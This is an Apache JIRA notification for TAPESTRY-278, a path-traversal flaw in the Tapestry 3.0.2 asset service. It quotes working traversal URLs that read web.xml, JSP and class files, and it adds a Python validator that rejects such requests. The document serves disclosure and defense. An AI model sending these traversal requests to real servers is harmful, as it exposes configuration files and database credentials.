Posted to dev@tapestry.apache.org by "gustav spellauge (JIRA)" <ta...@jakarta.apache.org> on 2005/03/10 11:14:55 UTC

[jira] Updated: (TAPESTRY-278) Tapestry 3.0.2 asset service has security flaw

     [ http://issues.apache.org/jira/browse/TAPESTRY-278?page=history ]

gustav spellauge updated TAPESTRY-278:
--------------------------------------

    Attachment: AssetService.patch

Here is a quick patch for version 3.0.2 (14.02.2005) which works for us.
Maybe the list of exposed MIME types needs to be extended.

> Tapestry 3.0.2 asset service has security flaw
> ----------------------------------------------
>
>          Key: TAPESTRY-278
>          URL: http://issues.apache.org/jira/browse/TAPESTRY-278
>      Project: Tapestry
>         Type: Bug
>   Components: Framework
>     Versions: 3.0.2
>  Environment: Tomcat 5, JDK 1.4
>     Reporter: Nathan Kopp
>  Attachments: AssetService.patch
>
> The asset service can be used to view files that should not be visible.  This could expose important resources, including database passwords and connection information.
> The asset service appears to expose any file relative to the classpath, and you can even use the ".." operator to go backwards, down into WEB-INF in general.
> Here are some examples.  They were tested on a demo application which is often available on the web, but they've been "cleaned," so they don't point to a real server anymore:
> * View the web.xml file:
> http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2F..%2Fweb.xml
> * View the tapestry.application file:
> http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2F..%2Ftapestry.application
> * View a raw JSP file:
> http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2F..%2F..%2F404.jsp
> * Download a few class files that are part of the application:
> http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2Forg%2Fappfuse%2Fweb%2FMessageFilter.class
> http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2Forg%2Fappfuse%2Fweb%2FBaseEngine.class



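The two weaknesses the report describes (a ".." segment that walks out of the classpath root into WEB-INF, and the service handing out any file it can find on the classpath, .class files included) can be checked independently of Tapestry. The block below is an added example, not Tapestry's AssetService and not the attached AssetService.patch, whose contents do not appear on the page. It takes the URLs quoted in the report as sample input, recovers the asset path from the "sp" parameter, and applies the two checks a hardened asset service needs: reject traversal on the raw segments, then serve only an allow-listed set of extensions. Assumptions: the leading "S" in "sp=S%2F..." is taken to be Tapestry 3's type prefix for a String service parameter and is stripped; the extension allow-list and the "/images/logo.gif" request are constructed for the example.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

# Extensions the asset service is allowed to serve, with their MIME types.
# Constructed allow-list for this example; the list in the attached
# AssetService.patch is not shown on the page.
ALLOWED_CONTENT_TYPES = {
    ".gif": "image/gif",
    ".jpg": "image/jpeg",
    ".jpeg": "image/jpeg",
    ".png": "image/png",
    ".css": "text/css",
    ".js": "application/javascript",
}

# The URLs quoted in the bug report, used here as sample input, plus one
# constructed legitimate asset request for contrast.
REPORTED_URLS = [
    "http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2F..%2Fweb.xml",
    "http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2F..%2Ftapestry.application",
    "http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2F..%2F..%2F404.jsp",
    "http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2Forg%2Fappfuse%2Fweb%2FMessageFilter.class",
    "http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2Forg%2Fappfuse%2Fweb%2FBaseEngine.class",
]
LEGITIMATE_URL = "http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2Fimages%2Flogo.gif"


def asset_path_from_url(url):
    """Pull the requested classpath-relative asset path out of an asset-service URL.

    parse_qs percent-decodes once, the same way the servlet container does.
    The leading 'S' is assumed to be Tapestry 3's type prefix for a String
    service parameter; it is not part of the path.
    """
    query = parse_qs(urlsplit(url).query)
    if query.get("service") != ["asset"]:
        raise ValueError("not an asset-service URL")
    sp = query["sp"][0]
    if not sp.startswith("S"):
        raise ValueError("unexpected service-parameter encoding: %r" % sp)
    return sp[1:]


def check_asset_path(path):
    """Decide whether PATH may be served. Returns (allowed, reason, content_type)."""
    # Anything that is not a plain '/'-separated path is refused outright:
    # backslashes, NUL bytes and a leftover '%' (a sign of double encoding).
    if any(c in path for c in "\\\x00%"):
        return (False, "illegal character in path", None)

    segments = path.lstrip("/").split("/")
    # Refuse traversal *before* any normalisation. posixpath.normpath("/../web.xml")
    # quietly collapses to "/web.xml", which would hide the attempt rather than
    # block it, so the check is made on the raw segments instead.
    if any(seg in ("", ".", "..") for seg in segments):
        return (False, "traversal or empty path segment", None)

    # Without traversal a client can still read .class, .properties and similar
    # files under the classpath (the last two URLs in the report contain no '..'
    # at all), so an extension allow-list is needed as well.
    ext = posixpath.splitext(segments[-1])[1].lower()
    content_type = ALLOWED_CONTENT_TYPES.get(ext)
    if content_type is None:
        return (False, "extension %r not in allow-list" % ext, None)
    return (True, "ok", content_type)


def triage(url):
    """Both steps for one URL: (asset path, allowed, reason, content type)."""
    path = asset_path_from_url(url)
    allowed, reason, content_type = check_asset_path(path)
    return (path, allowed, reason, content_type)


def triage_all(urls):
    """Triage every URL; returns a list of triage() tuples in input order."""
    return [triage(u) for u in urls]


if __name__ == "__main__":
    for path, allowed, reason, ctype in triage_all(REPORTED_URLS + [LEGITIMATE_URL]):
        verdict = "SERVE as %s" % ctype if allowed else "REJECT (%s)" % reason
        print("%-40s %s" % (path, verdict))
```

The order of the checks matters: the traversal test runs on the raw segments, because normalising first would turn "/../web.xml" into "/web.xml" and the request would then fail only on the extension check, with no record that a traversal was attempted. The '%' test is deliberately strict: the container has already decoded the query string once, so a percent sign that survives is either double encoding or a malformed request, and neither is worth serving.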